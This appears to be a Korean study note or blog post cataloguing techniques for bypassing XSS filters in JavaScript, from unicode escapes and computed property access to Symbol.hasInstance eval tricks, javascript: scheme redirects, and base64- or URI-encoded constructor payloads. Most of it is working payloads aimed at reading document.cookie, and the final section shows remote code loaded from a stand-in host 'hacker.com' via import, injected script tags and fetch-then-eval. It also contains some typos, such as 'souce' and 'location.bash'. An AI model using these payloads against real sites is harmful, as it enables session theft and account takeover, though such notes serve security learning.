[WEB] XSS 우회 #2
자바스크립트 함수 및 키워드 필터링
Unicode escape sequence
자바스크립트가 지원하는 Unicode escape sequence를 통해 유니코드 문자를 코드 포인트로 나타낼 수 있다.
필터링된 문자열을 Unicode로 변환해 우회하는 것이 가능하다.
var cookie1 = "\u0063ookie"; //cookie
var cookie2 = "cooki\x65"; //cookie
\u0061lert(document.cookie); //alert
Computed member access
객체의 특정 속성에 접근할 때 속성 이름을 동적으로 계산하는 기능이다.
document["coo"+"kie"] == document["cookie"] == document.cookie
alert(document["\u0063ook" + "ie"]); // alert(document.cookie)
window['al\x65rt'](document["\u0063ook" + "ie"]); //alert(document.cookie)
XSS 공격 구문의 자바스크립트 키워드를 필터링한 경우 우회할 수 있는 방법이 다앙햐다.
alert, XMLHttpRequest 등 문서 최상위 객체 및 함수 | window['al'+'ert'], window['XMLHtt'+'pRequest'] 등 이름 끊어서 쓰기 |
window | self, this |
eval(code) | Function(code)() |
Function | isNaN['constr'+'uctor'] 등 함수의 constructor 속성 접근 |
자바스크립트의 언어적 특성을 사용하면 [ ] ( ) ! + 6개의 문자만으로 모든 동작이 수행 가능하다.
문자열 선언
( ) [ ] " ' 문자 사용 못하는 경우
템플릿 리터럴(Template Literals) 사용
문자열 사용에 필요한 (", ') 가 필터링되어 있는 경우 템플릿 리터럴(Template Literals) 사용한다.
템플릿 리터럴은 백틱(`)을 사용하여 선언할 수 있으며 내장된 ${} 표현식을 이용해 다른 변수나 식 사용이 가능하다.
var a = "AAAA";
var b = "BBBB";
var c = `${a},
${b} ${1+1}.`; // "AAAA,\nBBBB 2."
RegExp 객체 사용
따옴표와 백틱을 모두 사용하지 못하는 경우 RegExp 객체를 생성하고 객체의 패턴을 가져와 문자열을 만들 수 있다.
var a = /AAAA BBBB!/.souce; // "AAAA BBBB!"
var b = /test !/ + [] // "/test !/"
String.fromCharCode 함수 사용
String.fromCharCode 함수는 유니코드 범위 중 파라미터로 전달된 수에 해당하는 문자를 반환한다.
var a = String.fromCharCode(72, 101, 108, 108, 111); // "Hello"
기본 내장 함수나 객체의 문자를 사용
내장 함수나 객체를 toString 함수를 이용해 문자열로 변경
var a = history.toString()[8] + // "H"
(history+[])[9] + // "i"
(URL+0)[12] + // "("
(URL+0)[13]; // ")" ==> "Hi()"
숫자 객체의 진법 변환
10진수 숫자를 36진수로 변경하여 아스키 영어 소문자 범위 생성 가능
E4X 연산자("..") 사용 (점 두개나 공백과 점을 조합해 사용)
var a = 29234652..toString(36); // "hello"
var b = 29234652 .toString(36); // "hello"
함수호출
일반적으로 자바스크립트의 함수 호출을 위해서는 소괄호 또는 백틱을 사용해야한다.
alert(1); // Parentheses
alert`1`; // Tagged Templates
소괄호와 백틱이 필터링 되어 있는 경우
javascript 스키마를 이용한 location 변경
javascript: 스키마를 이용하면 URL을 이용해 자바스크립트 코드를 실행할 수 있다.
이를 이용해 현재 location 객체를 변조하는 방식으로 자바스크립트 코드를 실행하는 것이 가능하다.
location="javascript:alert\x28document.domain\x29;";
location.href="javascript:alert\u0028document.domain\u0029;";
location['href']="javascript:alert\050document.domain\051;";
Symbol.hasInstance 오버라이딩 (뭔지 모르겠음)
Symbol.hasInstance well-known symbol 사용 시 instanceof 연산자를 오버라이드 할 수 있다.
O instanceof C 를 연산할 때 C에 Symbol.hasInstance 속성에 함수가 있을 경우 메소드로 호출하여 instanceof 연산자의 결과값으로 사용하게 된다.
이 특성을 이용해 instanceof를 연산하게 되면 실제 인스턴스 체크 대신 원하는 함수를 메소드로 호출 가능하다.
"alert\x28document.domain\x29"instanceof{[Symbol.hasInstance]:eval};
Array.prototype[Symbol.hasInstance]=eval;"alert\x28document.domain\x29"instanceof[];
document.body.innerHTML 추가
자바스크립트를 통해 새로운 HTML 코드를 추가한다.
document.body.innerHTML에 코드를 추가할 경우 새로운 HTML 코드가 문서에 추가되고, 이를 통해 자바스크립트 실행이 가능하다.
innerHTML로 HTML 코드를 실행할 시 <script> 태그는 실행되지 않으므로 이벤트 핸들러를 이용해 자바스크립트 코드를 실행해야 한다.
document.body.innerHTML+="<img src=x: onerror=alert(1)>";
document.body.innerHTML+="<body src=x: onload=alert(1)>";
필터링 우회 예시
1. window, document, alert 필터링
function XSSFilter(data){
if(/alert|window|document/.test(data)){
return false;
}
return true;
}
self['al'+'ert'](self['do'+'cument']['cookie'])
2. 키워드 및 특수문자 탐지
function XSSFilter(data){
if(/alert|window|document|eval|cookie|this|self|parent|top|opener|function|constructor|[\-+\\<>{}=]/i.test(data)){
return false;
}
return true;
}
Boolean[decodeURI('%63%6F%6E%73%74%72%75%63%74%6F%72')](
decodeURI('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29'))();
Boolean[atob('Y29uc3RydWN0b3I')](atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ'))();
// decodeURI, atob, constructor 사용하여 우회
3. ( ) " ' ` 필터링"
function XSSFilter(data){
if(/[()"'`]/.test(data)){
return false;
}
return true;
}
/alert/.source+[URL+[]][0][12]+/document.cookie/.source+[URL+[]][0][13] instanceof{[Symbol.hasInstance]:eval};
location=/javascript:/.source + /alert/.source + [URL+0][0][12] + /document.cookie/.source + [URL+0][0][13];
디코딩 전 필터링(Double encoding 등)
입력 검증은 디코딩 등의 모든 전처리 작업을 마치고 수행되어야 한다.
그러나 일부 웹 애플리케이션은 웹 방화벽의 필터링 기능에 의존하거나, 데이터의 개별 요소를 추출하기 전에 전체 데이터 (JSON, Form data)에 필터링을 수행하는 경우가 있다.
불필요한 인코딩을 줄이고, 애플리케이션에서 사용되는 인코딩 방식을 통일하는 방법으로 디코딩 전 필터링 취약점을 줄일 수 있다.
길이 제한
삽입할 수 있는 코드의 길이가 제한되어 있는 경우, 다른 경로로 실행할 추가적인 코드(payload)를 URL fragment 등으로 삽입 후 삽입 지점에는 본 코드를 실행하는 짧은 코드 (launcher)를 사용할 수 있다.
흔히 쓰이는 방법은 Fragment로 스크립트를 넘겨준 후 XSS 지점에서 location.bash로 URL fragment 부분을 추출하여 eval()로 실행한다.
그 외에도 쿠키에 페이로드를 저장하는 방식과 iimport와 같은 외부 자원을 스크립트로 로드하는 법을 사용할 수 있다.
1. location.hash 사용
https://example.com/?q=<img onerror="eval(location.hash.slice(1))">#alert(document.cookie);
2. 외부 자원 이용
import("http://hacker.com");
var e = document.createElement('script')
e.src='http://hacker.com';
document.appendChild(e);
fetch('http://hacker.com').then(x=>eval(x.text()))